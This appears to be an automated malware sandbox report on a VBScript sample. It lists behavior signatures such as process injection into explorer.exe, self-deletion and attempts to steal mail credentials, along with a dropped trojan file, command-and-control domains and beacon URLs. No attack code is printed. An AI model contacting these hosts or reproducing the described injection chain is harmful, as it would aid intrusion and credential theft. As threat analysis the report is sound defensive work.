            behaviorgraph top1 signatures2 2 Behavior Graph ID: 321602 Sample: 2Q4tLHa5wbO1.vbs Startdate: 23/11/2020 Architecture: WINDOWS Score: 100 86 Multi AV Scanner detection for domain / URL 2->86 88 Found malware configuration 2->88 90 Antivirus detection for dropped file 2->90 92 14 other signatures 2->92 8 control.exe 2->8         started        11 mshta.exe 19 2->11         started        13 wscript.exe 2 8 2->13         started        16 iexplore.exe 1 56 2->16         started        process3 file4 110 Changes memory attributes in foreign processes to executable or writable 8->110 112 Injects code into the Windows Explorer (explorer.exe) 8->112 114 Writes to foreign memory regions 8->114 124 4 other signatures 8->124 18 explorer.exe 8->18 injected 22 rundll32.exe 8->22         started        116 Suspicious powershell command line found 11->116 24 powershell.exe 32 11->24         started        66 C:\Users\user\AppData\Local\...\marginal.roq, PE32 13->66 dropped 68 C:\Users\user\AppData\Local\...\Bonaparte.zip, Zip 13->68 dropped 118 Benign windows process drops PE files 13->118 120 VBScript performs obfuscated calls to suspicious functions 13->120 122 Deletes itself after installation 13->122 126 3 other signatures 13->126 27 iexplore.exe 30 16->27         started        29 iexplore.exe 30 16->29         started        31 iexplore.exe 30 16->31         started        signatures5 process6 dnsIp7 76 c56.lepini.at 18->76 78 192.168.2.1 unknown unknown 18->78 80 api3.lepini.at 18->80 94 Tries to steal Mail credentials (via file access) 18->94 96 Changes memory attributes in foreign processes to executable or writable 18->96 98 Writes to foreign memory regions 18->98 108 3 other signatures 18->108 33 cmd.exe 18->33         started        36 RuntimeBroker.exe 18->36 injected 38 RuntimeBroker.exe 18->38 injected 47 2 other processes 18->47 58 C:\Users\user\AppData\Local\...\ztp4fhzn.0.cs, UTF-8 24->58 dropped 60 C:\Users\user\AppData\...\5b2bnkld.cmdline, UTF-8 24->60 dropped 100 Injects code into the Windows Explorer (explorer.exe) 24->100 102 Modifies the context of a thread in another process (thread injection) 24->102 104 Maps a DLL or memory area into another process 24->104 106 Compiles code for process injection (via .Net compiler) 24->106 40 csc.exe 3 24->40         started        43 csc.exe 24->43         started        45 conhost.exe 24->45         started        82 api10.laptok.at 47.241.19.44, 49732, 49733, 49737 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 27->82 file8 signatures9 process10 file11 84 Uses nslookup.exe to query domains 33->84 49 nslookup.exe 33->49         started        52 conhost.exe 33->52         started        62 C:\Users\user\AppData\Local\...\5b2bnkld.dll, PE32 40->62 dropped 54 cvtres.exe 40->54         started        64 C:\Users\user\AppData\Local\...\ztp4fhzn.dll, PE32 43->64 dropped 56 cvtres.exe 43->56         started        signatures12 process13 dnsIp14 70 222.222.67.208.in-addr.arpa 49->70 72 resolver1.opendns.com 49->72 74 myip.opendns.com 49->74

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\marginal.roq100%AviraTR/Crypt.XDR.Gen
            C:\Users\user\AppData\Local\Temp\marginal.roq100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\marginal.roq69%ReversingLabsWin32.Trojan.Razy

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            c56.lepini.at12%VirustotalBrowse
            api3.lepini.at11%VirustotalBrowse
            api10.laptok.at12%VirustotalBrowse
            222.222.67.208.in-addr.arpa2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
            http://c56.lepini.at/s0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            https://contoso.com/Icon0%Avira URL Cloudsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://c56.lepini.at//0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://api3.lepini.at/api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b0%Avira URL Cloudsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://ns.micro/10%Avira URL Cloudsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://c56.lepini.at:80/jvassets/xI/t64.dat0%Avira URL Cloudsafe
            http://ns.adobe.cmg0%Avira URL Cloudsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            myip.opendns.com
            84.17.52.25
            truefalse
              high
              c56.lepini.at
              47.241.19.44
              truetrueunknown
              resolver1.opendns.com
              208.67.222.222
              truefalse
                high
                api3.lepini.at
                47.241.19.44
                truefalseunknown
                api10.laptok.at
                47.241.19.44
                truefalseunknown
                222.222.67.208.in-addr.arpa
                unknown
                unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/jfalse
                • Avira URL Cloud: safe
                unknown
                http://api3.lepini.at/api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/bfalse
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://search.chol.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                  high
                  http://www.mercadolivre.com.br/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.merlin.com.pl/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://search.ebay.de/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                    high
                    http://www.mtv.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                      high
                      http://www.rambler.ru/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                        high
                        http://www.nifty.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                          high
                          http://www.dailymail.co.uk/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www3.fnac.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                            high
                            http://buscar.ya.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                              high
                              http://search.yahoo.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                high
                                https://corp.roblox.com/contact/RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmpfalse
                                  high
                                  http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1RuntimeBroker.exe, 00000020.00000003.856750140.000001B4FAF45000.00000004.00000001.sdmpfalse
                                    high
                                    http://constitution.org/usdeclar.txtC:powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://c56.lepini.at/sexplorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://https://file://USER.ID%lu.exe/updpowershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.sogou.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designersexplorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpfalse
                                        high
                                        http://asp.usatoday.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                          high
                                          http://fr.search.yahoo.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                            high
                                            http://rover.ebay.comexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                              high
                                              http://in.search.yahoo.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                high
                                                http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://search.ebay.in/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://%s.comexplorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      low
                                                      http://msk.afisha.ru/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.zhongyicts.com.cnexplorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000012.00000002.810095687.000001EF80001000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://search.rediff.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.ya.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.etmall.com.tw/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://it.search.dada.net/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.naver.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.google.ru/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://search.hanafos.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.roblox.com/developRuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.abril.com.br/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://search.daum.net/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        https://contoso.com/Iconpowershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://search.naver.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.clarin.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://buscar.ozu.es/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://c56.lepini.at//explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmptrue
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://kr.search.yahoo.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://search.about.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                http://busca.igbusca.com.br/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.ask.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.priceminister.com/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                      high
                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.cjmall.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.centrum.cz/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.carterandcone.comlexplorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://suche.t-online.de/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.google.it/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://search.auction.co.kr/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.ceneo.pl/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.amazon.de/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://sads.myspace.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.g5e.com/G5_End_User_License_Supplemental_TermsLC.HuluRuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://busca.buscape.com.br/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://google.pchome.com.tw/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://ns.micro/1RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.rambler.ru/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://uk.search.yahoo.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://espanol.search.yahoo.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.ozu.es/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://search.sify.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://openimage.interpark.com/interpark.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.yahoo.co.jp/favicon.icoexplorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://search.ebay.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.gmarket.co.kr/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://search.nifty.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://searchresults.news.com.au/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://www.google.si/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.google.cz/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.soso.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.univision.com/explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://c56.lepini.at:80/jvassets/xI/t64.datexplorer.exe, 0000001E.00000000.826002988.000000000A68A000.00000004.00000001.sdmptrue
